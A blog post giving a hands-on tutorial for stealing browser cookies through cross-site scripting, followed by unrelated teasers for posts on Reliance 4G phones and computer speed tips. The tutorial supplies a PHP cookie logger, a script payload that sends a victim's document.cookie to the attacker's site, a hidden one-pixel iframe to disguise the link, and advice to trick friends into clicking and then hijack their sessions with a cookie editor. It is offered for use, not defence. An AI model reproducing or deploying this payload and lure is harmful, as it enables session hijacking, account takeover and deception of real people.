Cookie Grabbing

Cookie Grabbing using XSS:-


<?php

$cookie=$_GET[‘cookie’];     //storing cookies in a variable called $cookie.
$file=fopen(“cookies.txt”,”a”);  //opening a file called cookies.txt with append mode.
fwrite($file,$cookie.”\n\n\n);
fclose($file);
?>

Save it as “ 1.php “

------------------------------------------------
Now the url looks like : www.site.com/some_folder/1.php

-----------------------------------------------
Find vuln in a site then put it like this below :

http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>

 now send this link but,mostly people wont click it because they find this url very suspicious.
So u need to mask it

-------------------------------------
Ex:

<iframe
src="http://some_vuln_site.com/somefolder/search.php?query=<script>document.location='http://Your_site.com/somefolder/1.php?cookie='.concat(escape(document.cookie));</script>" width="1" heigth="1"></iframe>
**
Now put this script in file called iclick.php .

Now your url looks like www.site.com/folder/iclick.php

Send this link to your friend or anyone else ask….(social engineer) to click on this link..
Tats it the cookies will be stored in cookies.txt file.
(download cookie editor addon and go on wat u want to do).

Comments

Post a Comment

Popular posts from this blog

Reliance to Launch 4G Smartphones Under 'Lyf' Brand

Image
Reliance Retail, part of the  Reliance Industries  group, said Friday it will soon launch its own brand of 4G LTE smartphones under the brand Lyf. In an emailed statement, Reliance Retail said the brand is "built on the premise of unmatched user experience will offer high performance handsets that deliver a true 4G experience comparableto the best in the world." To that end, Reliance Retail said the Lyf range of smartphones will come with features like voice over LTE (VoLTE), voice over Wi-Fi (VoWi-FI), as well as HD voice and HD quality video calling. The company has earlier talked about  launching 4G smartphones at Rs. 4,000  and offering services at Rs. 300 per month. Apart from Reliance Retail, the Lyf brand of smartphones will be available through a wider distribution and retail network including multi-brand outlets. Earlier this month, Reliance Industries (which owns Reliance Jio Infocomm) and Reliance Communications announced  a partnership to trade an
Read more

How to Make Your Computer Faster – 10 Proven tips

Image
Proven tips to make your Computer or Laptop run faster. How to make your computer faster  is a question that may be bothering many of you struggling hard with slower machines. Computers/Laptops start to slow down as they get older and clogged up with files, unused software and other digital debris. Even laptops with the fastest processors can start to run slow over time. However, that doesn’t necessarily mean you need to replace your machine with a new one or hire a computer geek to  make your Laptop run faster . Thankfully, you can  speed up your machine nearly to its full speed a lot easier than you think with few easy maintenance steps or inexpensive upgrades. Here are 10 proven simple tips on how to make your computer or laptop run faster, some of which of course, have been suggested many times before by computer experts. 1. How to make your Computer faster – Check free space on hard disk As you use your computer and load programs, files, music, photos etc, the availa
Read more